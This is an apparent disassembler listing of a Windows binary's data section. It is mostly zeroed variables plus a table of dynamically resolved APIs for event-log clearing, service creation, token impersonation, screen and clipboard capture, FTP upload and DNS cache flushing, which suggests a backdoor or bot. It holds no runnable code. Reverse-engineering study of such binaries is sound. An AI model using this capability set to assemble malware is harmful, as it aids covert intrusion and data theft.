dword_454DC0 dd 0 dword_454DC4 dd 0 dword_454DC8 dd 0 dword_454DCC dd 0 dword_454DD0 dd 0 dword_454DD4 dd 0 dword_454DD8 dd 53h dup(0) dword_454F24 dd 0 dword_454F28 dd 0 dword_454F2C dd 0 dword_454F30 dd 0 dword_454F34 dd 0 dword_454F38 dd 0 dword_454F3C dd 0 dword_454F40 dd 0 ; sub_4063FA+EB�r ...
align 8
dword_454F48 dd 96h dup(0) ; sub_4066B3+289�o ...
dword_4551A0 dd 3 dup(0) dword_4551AC dd 3 dup(0) dword_4551B8 dd 9 dup(0) dword_4551DC dd 3 dup(0) dword_4551E8 dd 9 dup(0) dword_45520C dd 49h dup(0) dword_455330 dd 10h dup(0) dword_455370 dd 0 dword_455374 dd 0 ; sub_405C6A+439�o
dword_455378 dd 0 ; sub_4066B3+514�r ...
dword_45537C dd 0 ; sub_4066B3+50A�r
dword_455380 dd 0 ; sub_4066B3:loc_406B98�r
dword_455384 dd 2 dup(0) ; sub_4066B3+22C�o ...
dword_45538C dd 0 dword_455390 dd 0 dword_455394 dd 41h dup(0) dword_455498 dd 41h dup(0) dword_45559C dd 0 ; sub_406C3A+EA�r
dword_4555A0 dd 0 dword_4555A4 dd 0 ; sub_406C3A+56�w ...
dword_4555A8 dd 23h dup(0) dword_455634 dd 0 ; sub_406C3A:loc_406D45�r
dword_455638 dd 0 dd 19h dup(0)
dword_4556A0 dd 0 ; .text:00408B42�w ...
align 8
byte_4556A8 db 0 ; DATA XREF: .text:0040822F�o
; .text:00408784�r ...
align 4
dd 3Fh dup(0)
dword_4557A8 dd 3 dup(0) dword_4557B4 dd 0 ; sub_409EB3+C0�r
dword_4557B8 dd 0 align 10h
dword_4557C0 dd 0 align 8
byte_4557C8 db 0 ; DATA XREF: sub_409EB3+BA�o
; sub_409F99+63�o
byte_4557C9 db 3 dup(0) ; DATA XREF: sub_409F99+74�o
dd 1FEh dup(0)
db 2 dup(0)
word_455FC6 dw 0 ; DATA XREF: sub_409F99+CF�o
dd 8Ah dup(0)
dword_4561F0 dd 0 ; sub_40A708:loc_40A845�w
align 8
dword_4561F8 dd 4 dup(0) dword_456208 dd 0 dword_45620C dd 41h dup(0) dword_456310 dd 41h dup(0) dword_456414 dd 0 ; sub_40A938+226C�r ...
dword_456418 dd 0 dword_45641C dd 0 ; sub_40A938+21BD�w ...
dword_456420 dd 23h dup(0) dword_4564AC dd 0 ; sub_40A938:loc_40CBC8�r
dword_4564B0 dd 0 align 8
dword_4564B8 dd 0 ; sub_40A938+672C�o
dd 20h dup(0)
dword_45653C dd 0 ; sub_40A938+673E�r
dd 0Ah dup(0)
dword_456568 dd 0 dword_45656C dd 0 dd 0
dword_456574 dd 0 ; sub_40A938:loc_4110E1�r
align 10h
dword_456580 dd 80h dup(0) ; sub_401B6E+26E�o ...
dword_456780 dd 0 ; sub_401B6E+262�r ...
align 8
dword_456788 dd 80h dup(0) ; sub_4063FA+1DF�o ...
dword_456988 dd 80h dup(0) ; sub_4063FA+1DA�o ...
dword_456B88 dd 80h dup(0) ; sub_4063FA:loc_40658E�o ...
dword_456D88 dd 0 ; sub_401B6E+81�w ...
dword_456D8C dd 0 ; resolved to->GDI32.DeleteDC ; sub_41729C+66F�r
dword_456D90 dd 0 ; resolved to->KERNEL32.Module32Firstdword_456D94 dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_41729C+9A0�w ...
dword_456D98 dd 0 ; sub_41729C+BE5�r
dword_456D9C dd 0 ; sub_41729C+BB5�r ...
dword_456DA0 dd 0 ; resolved to->GDI32.SelectObject ; sub_41729C+65F�r
dword_456DA4 dd 0 ; sub_41729C+BDD�r
dword_456DA8 dd 0 ; resolved to->ADVAPI32.OpenServiceA ; sub_41729C+404�w ...
dword_456DAC dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_41BD3B+177�r
dword_456DB0 dd 0 ; resolved to->ADVAPI32.StartServiceA ; sub_4051C0+12B�r ...
dword_456DB4 dd 0 ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_41729C+4FE�r
dword_456DB8 dd 0 ; resolved to->WS2_32.__WSAFDIsSet ; sub_402CBA+162�r ...
dword_456DBC dd 0 ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_41729C+DF�r
dword_456DC0 dd 0 ; sub_41729C+BA8�r ...
dword_456DC4 dd 0 ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4051C0:loc_4052BB�r ...
dword_456DC8 dd 0 ; resolved to->WININET.InternetCrackUrlA ; sub_41729C+A5B�r ...
dword_456DCC dd 0 ; resolved to->USER32.GetWindowThreadProcessId ; sub_41729C+277�r
dword_456DD0 dd 0 ; resolved to->ADVAPI32.RegQueryValueExA ; sub_41729C+359�r ...
dword_456DD4 dd 0 ; resolved to->WININET.InternetOpenUrlA ; sub_41729C+A53�r ...
dword_456DD8 dd 0 ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_41729C+107�r
dword_456DDC dd 0 ; resolved to->WININET.InternetReadFile ; sub_41729C+A63�r ...
dword_456DE0 dd 0 ; resolved to->ADVAPI32.LockServiceDatabase ; sub_41729C+50E�r ...
dword_456DE4 dd 0 ; resolved to->ADVAPI32.RegEnumValueA ; sub_41729C+379�r ...
dword_456DE8 dd 0 ; resolved to->WS2_32.WSAAsyncSelect ; sub_41729C+861�r
dword_456DEC dd 0 ; resolved to->KERNEL32.Process32Next ; sub_41729C+D7�r
dword_456DF0 dd 0 ; resolved to->IPHLPAPI.IcmpSendEchodword_456DF4 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_41729C+C33�w ...
dword_456DF8 dd 0 ; resolved to->WININET.FtpGetFileAdword_456DFC dd 0 ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_41729C+FF�r
dword_456E00 dd 0 ; sub_41729C+EAF�r ...
dword_456E04 dd 0 ; resolved to->GDI32.GetDIBColorTable ; sub_41729C+657�r
dword_456E08 dd 0 ; resolved to->WS2_32.ntohl ; sub_407252+F6�r ...
dword_456E0C dd 0 ; sub_41729C+B6D�w ...
dword_456E10 dd 0 ; resolved to->WS2_32.ntohs ; sub_41729C+8E5�r ...
dword_456E14 dd 0 ; sub_41729C+D4C�w
dword_456E18 dd 0 ; resolved to->WININET.InternetGetConnectedState ; sub_41729C+A1C�r ...
dword_456E1C dd 0 ; resolved to->USER32.ExitWindowsExdword_456E20 dd 0 ; sub_41729C+BBD�r ...
dword_456E24 dd 0 ; resolved to->ADVAPI32.ControlService ; sub_41729C+4DE�r ...
dword_456E28 dd 0 ; resolved to->ADVAPI32.OpenThreadToken ; sub_41729C+3BE�r ...
dword_456E2C dd 0 ; resolved to->ADVAPI32.CloseEventLog ; sub_41729C+587�w ...
dword_456E30 dd 0 ; resolved to->ADVAPI32.DeleteService ; sub_4051C0+136�r ...
dword_456E34 dd 0 ; resolved to->WS2_32.getpeernamedword_456E38 dd 0 ; resolved to->WS2_32.WSACleanup ; sub_41729C+705�w ...
dword_456E3C dd 0 ; resolved to->GDI32.DeleteObjectdword_456E40 dd 0 ; sub_41729C+B94�w ...
dword_456E44 dd 0 ; resolved to->ADVAPI32.RegDeleteValueA ; sub_41729C+361�r ...
dword_456E48 dd 0 ; resolved to->ADVAPI32.RegEnumKeyExA ; sub_420EA3+8A�r ...
dword_456E4C dd 0 ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_41729C+E7�r
dword_456E50 dd 0 ; resolved to->ADVAPI32.SetServiceStatus ; sub_421F40+12A�r ...
dword_456E54 dd 0 ; resolved to->SHELL32.ShellExecuteA ; sub_41729C+D99�w ...
dword_456E58 dd 0 ; resolved to->WS2_32.WSAStartup ; sub_41729C+844�r ...
dword_456E5C dd 0 ; resolved to->WININET.HttpSendRequestA ; sub_41729C+A3F�r ...
dword_456E60 dd 0 ; resolved to->USER32.CloseWindow ; sub_41729C+1C6�r
dword_456E64 dd 0 ; sub_41729C+B53�w ...
dword_456E68 dd 0 ; resolved to->ADVAPI32.QueryServiceLockStatusA ; sub_41729C+516�r ...
dword_456E6C dd 0 ; sub_41729C+E3B�r
dword_456E70 dd 0 ; resolved to->ADVAPI32.OpenEventLogA ; sub_41729C+57A�w ...
dword_456E74 dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_41729C+ADD�r
dword_456E78 dd 0 ; resolved to->ADVAPI32.RegDeleteKeyA ; sub_41729C+369�r ...
dword_456E7C dd 0 dword_456E80 dd 0 ; resolved to->ADVAPI32.ClearEventLogA ; sub_41729C+56D�w ...
dword_456E84 dd 0 ; resolved to->WS2_32.WSAGetLastError ; sub_41729C+879�r
dword_456E88 dd 0 ; resolved to->WININET.InternetOpenA ; sub_41729C+A22�r
dword_456E8C dd 0 ; resolved to->SHLWAPI.PathRemoveFileSpecA ; sub_4181F4+305�r ...
dword_456E90 dd 0 ; resolved to->USER32.IsWindow ; sub_41729C+1E3�r
dword_456E94 dd 0 ; resolved to->IPHLPAPI.GetNetworkParamsdword_456E98 dd 0 ; resolved to->WS2_32.getsockname ; sub_40A938+9997�r ...
dword_456E9C dd 0 ; resolved to->WS2_32.connect ; sub_401B6E+76�r ...
dword_456EA0 dd 0 ; resolved to->WS2_32.WSAIoctl ; sub_41729C+86D�r ...
dword_456EA4 dd 0 ; resolved to->ADVAPI32.RegQueryInfoKeyA ; sub_42105D+7A�r
dword_456EA8 dd 0 ; resolved to->USER32.GetWindowInfo ; sub_41729C+26F�r
dword_456EAC dd 0 ; resolved to->USER32.ShowWindow ; sub_41729C+27F�r
dword_456EB0 dd 0 ; sub_41729C:loc_417D44�w ...
dword_456EB4 dd 0 ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_41729C+349�r ...
dword_456EB8 dd 0 ; resolved to->WS2_32.gethostbyaddr ; sub_41729C+823�w ...
dword_456EBC dd 0 ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_41729C+3D3�r ...
dword_456EC0 dd 0 ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_41729C+4F6�r ...
dword_456EC4 dd 0 ; sub_41FB92+B5�r ...
dword_456EC8 dd 0 ; sub_41729C+E33�r
dword_456ECC dd 0 ; sub_41729C+EBC�r ...
dword_456ED0 dd 0 ; resolved to->WININET.HttpOpenRequestA ; sub_41729C+A37�r ...
dword_456ED4 dd 0 ; resolved to->USER32.OpenClipboard ; sub_41729C+1F3�r
dword_456ED8 dd 0 ; resolved to->USER32.IsWindowVisible ; sub_41729C+287�r
dword_456EDC dd 0 ; resolved to->IPHLPAPI.GetIfTable ; sub_41729C+CC4�r ...
dword_456EE0 dd 0 ; resolved to->WININET.InternetConnectA ; sub_41729C+A47�r ...
dword_456EE4 dd 0 ; resolved to->WSOCK32.recvfrom ; sub_41729C+7A8�w ...
dword_456EE8 dd 0 ; resolved to->ADVAPI32.RegCloseKey ; sub_41729C+371�r ...
dword_456EEC dd 0 ; sub_423BB1+8C�r
dword_456EF0 dd 0 ; resolved to->WSOCK32.setsockopt ; sub_40A14F+34�r ...
dword_456EF4 dd 0 ; resolved to->IPHLPAPI.GetTcpTable ; sub_41729C+CD0�r
dword_456EF8 dd 0 ; resolved to->ADVAPI32.OpenProcessToken ; sub_41729C+3CB�r ...
dword_456EFC dd 0 ; resolved to->WS2_32.select ; sub_4022B8+B6�r ...
dword_456F00 dd 0 ; resolved to->GDI32.CreateDCA ; sub_41729C+632�r
dword_456F04 dd 0 ; resolved to->USER32.GetClipboardData ; sub_41729C+1FB�r
dword_456F08 dd 0 ; resolved to->ADVAPI32.OpenSCManagerA ; sub_41729C+3F7�w ...
dword_456F0C dd 0 ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_456F10 dd 0 ; sub_41729C+EC4�r ...
dword_456F14 dd 0 ; resolved to->WS2_32.ntohl ; sub_4021D4+2B�r ...
dword_456F18 dd 0 ; resolved to->WS2_32.ntohs ; sub_401B6E+50�r ...
dword_456F1C dd 0 ; resolved to->KERNEL32.Process32First ; sub_41729C+CF�r
dword_456F20 dd 0 ; resolved to->GDI32.GetDeviceCaps ; sub_41729C+64F�r
dword_456F24 dd 0 ; resolved to->USER32.FindWindowA ; sub_41729C+17E�w ...
dword_456F28 dd 0 dword_456F2C dd 0 ; resolved to->WS2_32.gethostname ; sub_41729C+93D�r ...
dword_456F30 dd 0 ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerA ; sub_41729C+52E�r ...
dword_456F34 dd 0 ; resolved to->ADVAPI32.UnlockServiceDatabase ; sub_41729C+526�r ...
dword_456F38 dd 0 ; resolved to->WSOCK32.recv ; sub_401B6E+EE�r ...
dword_456F3C dd 0 ; sub_41729C+E43�r
dword_456F40 dd 0 ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_41729C+C7�r
dword_456F44 dd 0 ; resolved to->ADVAPI32.RegSetValueExA ; sub_41729C+351�r ...
dword_456F48 dd 0 ; resolved to->WS2_32.listen ; sub_40A14F+5D�r ...
dword_456F4C dd 0 ; resolved to->WS2_32.bind ; sub_40A14F+47�r ...
dword_456F50 dd 0 ; resolved to->WININET.InternetCloseHandle ; sub_4181F4+10C�r ...
dword_456F54 dd 0 dword_456F58 dd 0 ; sub_41729C+E1E�r
dword_456F5C dd 0 ; resolved to->WS2_32.inet_addr ; sub_401B6E+40�r ...
dword_456F60 dd 0 ; resolved to->GDI32.CreateDIBSection ; sub_41729C+63F�r
dword_456F64 dd 0 ; resolved to->GDI32.BitBlt ; sub_41729C+667�r
dword_456F68 dd 0 ; resolved to->GDI32.CreateCompatibleDC ; sub_41729C+647�r
dword_456F6C dd 0 ; resolved to->WS2_32.send ; sub_401642+35�r ...
dword_456F70 dd 0 ; resolved to->KERNEL32.GetComputerNameA ; sub_41BD3B+188�r ...
dword_456F74 dd 0 ; resolved to->USER32.CloseClipboard ; sub_41729C+203�r
dword_456F78 dd 0 ; sub_41729C+BF5�r
dword_456F7C dd 0 ; resolved to->USER32.SendMessageA ; sub_40A938+2517�r ...
dword_456F80 dd 0 ; sub_41FB92+E1�r
dword_456F84 dd 0 ; resolved to->IPHLPAPI.GetUdpTabledword_456F88 dd 0 ; resolved to->KERNEL32.GetDriveTypeA ; sub_41729C+EF�r
dword_456F8C dd 0 ; resolved to->WS2_32.sendto ; .text:0040A461�r ...
dword_456F90 dd 0 ; sub_405990+93�r ...
dword_456F94 dd 0 ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_41FD79+80�r ...
dword_456F98 dd 0 ; resolved to->ADVAPI32.CreateServiceA ; sub_41729C+45F�w ...
dword_456F9C dd 0 ; resolved to->WININET.FtpPutFileAdword_456FA0 dd 0 ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_41729C+33C�r ...
dword_456FA4 dd 0 ; resolved to->SHELL32.SHChangeNotifydword_456FA8 dd 0 ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_41729C+CBC�r ...
dword_456FAC dd 0 ; resolved to->IPHLPAPI.GetIpNetTable ; sub_41729C+CAF�r ...
dword_456FB0 dd 0 ; resolved to->WS2_32.socket ; sub_401B6E+5E�r ...
dword_456FB4 dd 0 ; resolved to->WS2_32.gethostbyname ; sub_41729C+816�w ...
dword_456FB8 dd 0 ; sub_41729C+E2B�r
dword_456FBC dd 0 ; resolved to->WS2_32.inet_ntoa ; sub_4022B8+14�r ...
dword_456FC0 dd 0 ; sub_405990+15E�r ...
dword_456FC4 dd 0 ; resolved to->WS2_32.accept ; sub_41729C+7E2�w ...
dword_456FC8 dd 0 ; resolved to->WS2_32.shutdown ; sub_41C9BC+22�r
dword_456FCC dd 0 ; resolved to->USER32.EnumWindows ; sub_41729C+262�r ...
dword_456FD0 dd 0 ; resolved to->WS2_32.closesocket ; sub_401B6E+312�r ...
dword_456FD4 dd 0 ; resolved to->WS2_32.ioctlsocket ; sub_40238D+4C�r ...
dword_456FD8 dd 0 ; sub_41729C+D53�r
dword_456FDC dd 0 ; resolved to->WS2_32.WSASocketA ; sub_41729C+855�r
dword_456FE0 dd 0 ; sub_405990+7F�r ...
dword_456FE4 dd 0 ; resolved to->KERNEL32.SetErrorMode ; sub_40797B+4B�r ...
dword_456FE8 dd 0 ; resolved to->USER32.DestroyWindow ; sub_41729C+1EB�r
dword_456FEC dd 0 ; resolved to->ADVAPI32.ImpersonateLoggedOnUser ; sub_41729C+506�r ...
dword_456FF0 dd 0 ; resolved to->ADVAPI32.ChangeServiceConfig2A ; sub_41729C+51E�r ...
dword_456FF4 dd 0 ; resolved to->USER32.GetClassNameAdword_456FF8 dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_41729C+AEA�r
dword_456FFC dd 0 ; resolved to->ADVAPI32.StartServiceCtrlDispatcherA ; sub_418D49+174�r
dword_457000 dd 0 ; resolved to->KERNEL32.SearchPathA ; sub_41729C+F7�r ...
dword_457004 dd 0 ; sub_41729C+137�w
dword_457008 dd 0 dword_45700C dd 0 ; sub_41729C:loc_41753C�w
dword_457010 dd 0 dword_457014 dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_40A938+1ADF�r ...
dd 0
dword_45701C dd 0 dword_457020 dd 0 dword_457024 dd 0 dword_457028 dd 0 dword_45702C dd 0 dword_457030 dd 0 ; sub_41729C:loc_417D0B�w ...
dword_457034 dd 0 dword_457038 dd 0 dword_45703C dd 0 dword_457040 dd 0 dword_457044 dd 0 dword_457048 dd 0 dword_45704C dd 0 dword_457050 dd 0 ; sub_41729C:loc_417F9C�w ...
align 8
dword_457058 dd 0 dword_45705C dd 0 dword_457060 dd 0 dword_457064 dd 0 dword_457068 dd 0 dword_45706C dd 0 dword_457070 dd 0 dd 2 dup(0)
dword_45707C dd 0 ; sub_41729C+EE6�w
dword_457080 dd 0 dword_457084 dd 0 ; sub_42377D:loc_4237F5�r
dword_457088 dd 0 dd 2 dup(0)
dword_457094 dd 0 dword_457098 dd 0 align 10h
dword_4570A0 dd 0 ; sub_418CCA+A�o ...
dd 5 dup(0)
dword_4570B8 dd 0 ; sub_418CCA+5F�r
dd 2D9h dup(0)
dword_457C20 dd 4 dup(0) ; sub_4022B8+C�o ...
dword_457C30 dd 0 align 8
dword_457C38 dd 28h dup(0) ; sub_40A938:loc_413219�o ...
dword_457CD8 dd 4 dup(0) ; sub_4022B8+2B�o ...
dword_457CE8 dd 0 ; sub_402CBA+46C�w
dword_457CEC dd 0 ; sub_418EDB+5A3�w ...
dword_457CF0 dd 0 align 8
dword_457CF8 dd 41h dup(0) ; sub_422394+60�o
dword_457DFC dd 0Fh dup(0) dword_457E38 dd 0 ; sub_40A938+1952�r ...
align 10h
dword_457E40 dd 40h dup(0) dword_457F40 dd 0 ; sub_40A938+89FA�r ...
dword_457F44 dd 0 ; sub_418EDB+663�r ...
dword_457F48 dd 0 ; sub_406C3A+24�r ...
byte_457F4C db 0 ; DATA XREF: sub_4164D0+D9�o
; sub_420BF0+50�o
byte_457F4D db 3 dup(0) ; DATA XREF: sub_4164D0+F1�o
; sub_420C63+23�o
dword_457F50 dd 0Dh dup(0) dword_457F84 dd 0Dh dup(0) dword_457FB8 dd 0 ; sub_41BB45:loc_41BBBB�r ...
dword_457FBC dd 107h dup(0) dword_4583D8 dd 4 dup(0) dword_4583E8 dd 4 dup(0) byte_4583F8 db 0 ; DATA XREF: sub_41D1E5+B�o
; sub_41D1E5+5A�w
align 4
dd 3 dup(0)
dword_458408 dd 4 dup(0) dword_458418 dd 4 dup(0) dword_458428 dd 0 byte_45842C db 0 ; DATA XREF: sub_41D17C+A�o
; sub_41D17C+2B�r
align 10h
dd 3 dup(0)
dword_45843C dd 4 dup(0) byte_45844C db 0 ; DATA XREF: sub_41D137+5�o
; sub_41D137+2C�w ...
align 10h
dd 3 dup(0)
byte_45845C db 0 ; DATA XREF: sub_41D252+E�o
; sub_41D252+14A�w
align 10h
dd 3 dup(0)
dword_45846C dd 4 dup(0) dword_45847C dd 4 dup(0) dword_45848C dd 0 ; sub_41C7EB+B3�w ...
dword_458490 dd 0 ; sub_41C53A+35�r ...
align 10h
dword_4584A0 dd 0 ; sub_41C5FE+1�o ...
align 10h
dword_4584B0 dd 0 ; sub_41C63E+35�r
dd 86h dup(0)
db 0
byte_4586CD db 3 dup(0) ; DATA XREF: sub_41C53A+13�o
; sub_41C598+47�o ...
dword_4586D0 dd 0 ; sub_41E59B+58�r ...
dword_4586D4 dd 0 ; sub_41E59B+3B�r ...
dword_4586D8 dd 0 ; sub_41E6F8+8D�o
dword_4586DC dd 0 ; sub_41E6F8+121�w ...
dword_4586E0 dd 0 ; sub_41E59B+F3�r ...
dd 4 dup(0)
dword_4586F4 dd 0Dh dup(0) ; sub_41E6F8:loc_41E837�o
dword_458728 dd 0 ; sub_41EBD7+4D�r ...
align 10h
dword_458730 dd 0 ; sub_41EBD7+CE�r ...
dd 9C3h dup(0)
dword_45AE40 dd 40h dup(0) ; sub_41EF29+4C�o
dword_45AF40 dd 20h dup(0) dword_45AFC0 dd 0 ; sub_41F02F:loc_41F0C4�r
align 8
dword_45AFC8 dd 0 ; sub_421277+5E�w ...
dd 4000h dup(0)
dword_46AFCC dd 0 ; sub_42211B+63�r ...
dword_46AFD0 dd 0 ; sub_42207E+50�w
dword_46AFD4 dd 0 ; sub_42207E+8�w ...
dword_46AFD8 dd 0 ; sub_42207E+1C�w ...
dword_46AFDC dd 0 dword_46AFE0 dd 0 dword_46AFE4 dd 0 dword_46AFE8 dd 0 ; sub_42207E+5B�w
dword_46AFEC dd 0 ; sub_42207E+61�w
dword_46AFF0 dd 0 ; sub_407252+94�o ...
dd 9C3h dup(0)
dword_46D700 dd 0 ; sub_4233DE+79�w ...
dword_46D704 dd 0 ; sub_402646+47�r ...
dword_46D708 dd 0 ; sub_41E6F8+16B�w ...
dword_46D70C dd 0 ; sub_40242A+15D�w ...
dword_46D710 dd 0 ; .text:0040A20D�w ...
dd 0A4Dh dup(0)
db 3 dup(0)
byte_47004B db 0 ; DATA XREF: .text:0043C5C9�o
; .text:0043E4D1�o
db 3 dup(0)
byte_47004F db 0 ; DATA XREF: .text:0044ED1C�o
dd 7FFFh dup(0)
db 0
byte_49004D db 3 dup(0) ; DATA XREF: .text:0044ED78�o
; .text:0044EF2C�o
dword_490050 dd 3 dup(0) dword_49005C dd 7FFAh dup(0) db 3 dup(0)
byte_4B0047 db 0 ; DATA XREF: .text:0043C5F1�o
; .text:0043E4F9�o
dd 13B8h dup(0)
db 3 dup(0)
byte_4B4F2B db 0 ; DATA XREF: .text:off_4506BC�o
dd 2C4Ah dup(0)
dword_4C0054 dd 507Dh dup(0) db 0
byte_4D4249 db 3 dup(0) ; DATA XREF: .text:off_43DA58�o
dd 5C1h dup(0)
db 3 dup(0)
byte_4D5953 db 0 ; DATA XREF: .text:off_44D5C0�o
dd 29BDh dup(0)
db 0
byte_4E0049 db 3 dup(0) ; DATA XREF: .text:0044ED88�o
; .text:0044EF1C�o
db 3 dup(0)
byte_4E004F db 0 ; DATA XREF: .text:0044ED20�o
dd 103Fh dup(0)
dword_4E414C dd 202h dup(0) db 3 dup(0)
byte_4E4957 db 0 ; DATA XREF: .text:off_4476F8�o
dd 27Ah dup(0)
db 0
byte_4E5341 db 3 dup(0) ; DATA XREF: .text:off_44D594�o
dd 2B43h dup(0)
db 2 dup(0)
word_4F0052 dw 0 ; DATA XREF: .text:0043C5CD�o
; .text:0043E4D5�o
dd 0B3Dh dup(0)
dword_4F2D48 dd 34ADh dup(0) db 3 dup(0)
byte_4FFFFF db 0 ; DATA XREF: sub_41F02F+33A�o
dd 12h dup(0)
db 0
byte_500049 db 3 dup(0) ; DATA XREF: .text:off_44ED68�o
; .text:off_44EF38�o
dword_50004C dd 2 dup(0) db 0
byte_500055 db 3 dup(0) ; DATA XREF: .text:0043C5D1�o
; .text:0043E4D9�o
dd 4005h dup(0)
dword_51006C dd 3FF5h dup(0) ; .text:0043E4DD�o
db 2 dup(0)
word_520042 dw 0 ; DATA XREF: .text:off_44ED48�o
dd 2 dup(0)
db 3 dup(0)
byte_52004F db 0 ; DATA XREF: .text:0043C5C5�o
; .text:0043E4CD�o
dword_520050 dd 0 ; .text:off_44EF18�o
dword_520054 dd 3FFDh dup(0) db 0
byte_530049 db 3 dup(0) ; DATA XREF: .text:0043C5E1�o
; .text:0043E4E9�o
dd 935h dup(0)
dword_532520 dd 47CCh dup(0) dword_544450 dd 3C0h dup(0) dword_545350 dd 3C3Dh dup(0) db 0
byte_554445 db 3 dup(0) ; DATA XREF: .text:off_43D660�o
dd 1C0h dup(0)
dword_554B48 dd 2D3Fh dup(0) db 0
byte_560045 db 3 dup(0) ; DATA XREF: .text:0043C5E9�o
; .text:0043E4F1�o
dd 1482h dup(0)
db 3 dup(0)
byte_565253 db 0 ; DATA XREF: .text:off_43A5D7�o
dd 2B7Eh dup(0)
db 3 dup(0)
byte_57004F db 0 ; DATA XREF: .text:0044ED4C�o
dd 3FFDh dup(0)
db 2 dup(0)
word_580046 dw 0 ; DATA XREF: .text:off_43BAB4�o
; .text:0043BABC�o ...
dd 53BEh dup(0)
db 2 dup(0)
word_594F42 dw 0 ; DATA XREF: .text:off_44F898�o
dd 0AC38h dup(0)
dword_5C0024 dd 7 dup(0) ; .text:0043C0B4�o
db 3 dup(0)
byte_5C0043 db 0 ; DATA XREF: .text:0044ED6C�o
dd 2 dup(0)
db 2 dup(0)
word_5C004E dw 0 ; DATA XREF: .text:0044ED7C�o
db 2 dup(0)
word_5C0052 dw 0 ; DATA XREF: .text:0044ED54�o
; .text:0044ED90�o
dd 2 dup(0)
dword_5C005C dd 0E79h dup(0) db 0
byte_5C3A41 db 3 dup(0) ; DATA XREF: .text:off_4473E0�o
dd 0D086h dup(0)
db 3 dup(0)
byte_5F7C5F db 0 ; DATA XREF: .text:off_44F8C8�o
dd 7940h dup(0)
db 0
byte_616161 db 3 dup(0) ; DATA XREF: .text:off_43DAA8�o
dd 1BFh dup(0)
db 0
byte_616861 db 3 dup(0) ; DATA XREF: .text:off_44F87C�o
dd 25F3h dup(0)
db 0
byte_620031 db 3 dup(0) ; DATA XREF: .text:0043C5ED�o
; .text:0043E4F5�o
dd 0ACBh dup(0)
db 0
byte_622B61 db 3 dup(0) ; DATA XREF: .text:off_44DCFC�o
dd 1083h dup(0)
db 3 dup(0)
byte_626D73 db 0 ; DATA XREF: .text:off_43D680�o
dd 3D3Bh dup(0)
db 0
byte_636261 db 3 dup(0) ; DATA XREF: .text:off_43D750�o
dd 42h dup(0)
db 0
byte_63636D db 3 dup(0) ; DATA XREF: .text:off_44F904�o
dd 75h dup(0)
dword_636544 dd 248h dup(0) db 2 dup(0)
word_636E66 dw 0 ; DATA XREF: .text:off_43D3FC�o
dd 3 dup(0)
db 2 dup(0)
word_636E76 dw 0 ; DATA XREF: .text:off_43D970�o
dd 0FEh dup(0)
db 3 dup(0)
byte_637273 db 0 ; DATA XREF: .text:off_446E14�o
dd 7Bh dup(0)
db 3 dup(0)
byte_637463 db 0 ; DATA XREF: .text:off_4462B0�o
dd 105h dup(0)
db 2 dup(0)
word_63787A dw 0 ; DATA XREF: .text:off_43D2C0�o
dd 3A35h dup(0)
db 3 dup(0)
byte_646153 db 0 ; DATA XREF: .text:off_44F8BC�o
dd 3 dup(0)
db 2 dup(0)
word_646162 dw 0 ; DATA XREF: .text:off_44F9B0�o
dd 0FCh dup(0)
db 3 dup(0)
byte_646557 db 0 ; DATA XREF: .text:00437F08�o
dd 486h dup(0)
dword_647770 dd 223Fh dup(0) db 2 dup(0)
word_65006E dw 0 ; DATA XREF: .text:off_44ED00�o
dd 1B2Dh dup(0)
dword_656D24 dd 20Ch dup(0) dword_657554 dd 87h dup(0) db 0
byte_657771 db 3 dup(0) ; DATA XREF: .text:off_43D504�o
dd 2414h dup(0)
dword_6607C4 dd 0 ; sub_4234DB+24�o ...
dword_6607C8 dd 0 ; sub_426B7C+93�w ...
dword_6607CC dd 4 dup(0) dword_6607DC dd 0 ; sub_4256AE+9�o
byte_6607E0 db 0 ; DATA XREF: sub_42625A+E�o
; sub_42625A+48�w ...
align 4
dd 31h dup(0)
dword_6608A8 dd 0 ; sub_426402:loc_4265EA�w ...
dword_6608AC dd 0 ; sub_426402+3A�w ...
dd 0
dword_6608B4 dd 0 ; sub_42660A+41�r
dd 7Fh dup(0)
dword_660AB4 dd 0 ; sub_42660A+50�w
dword_660AB8 dd 0 ; sub_42660A+56�r
dd 906h dup(0)
dword_662ED4 dd 0 ; sub_423756+19�o
dword_662ED8 dd 293Ch dup(0) byte_66D3C8 db 0 ; DATA XREF: sub_424551+21�o
; sub_424551+45�r ...
align 4
dword_66D3CC dd 0A01h dup(0) ; sub_426AA3+27�o
dword_66FBD0 dd 0 ; sub_423850+11B�o ...
dd 18h dup(0)
byte_66FC34 db 0 ; DATA XREF: sub_423850+1D5�w
; sub_423850+30E�w ...
align 4
dd 18h dup(0)
dword_66FC98 dd 0 ; sub_423850+270�o ...
dd 0EDh dup(0)
db 0
byte_670051 db 3 dup(0) ; DATA XREF: .text:0043C5E5�o
; .text:0043E4ED�o
dd 0D85h dup(0)
dword_673668 dd 0 ; sub_423850+131�r ...
dword_67366C dd 0 ; sub_424551+5�r ...
dword_673670 dd 0 dd 42h dup(0)
dword_67377C dd 0 ; sub_424699+19B�r ...
dword_673780 dd 0 ; sub_424699+1A8�r ...
dword_673784 dd 0 ; sub_424699+1B0�r ...
dword_673788 dd 0 dword_67378C dd 0 ; sub_424699+1C8�r ...
dword_673790 dd 0 ; sub_424699+1B8�r
dword_673794 dd 0 ; sub_424699+1C0�r ...
dword_673798 dd 0 ; sub_424990+28�r
dword_67379C dd 0 ; sub_424894+21�w ...
dword_6737A0 dd 0 ; sub_424699+E2�w ...
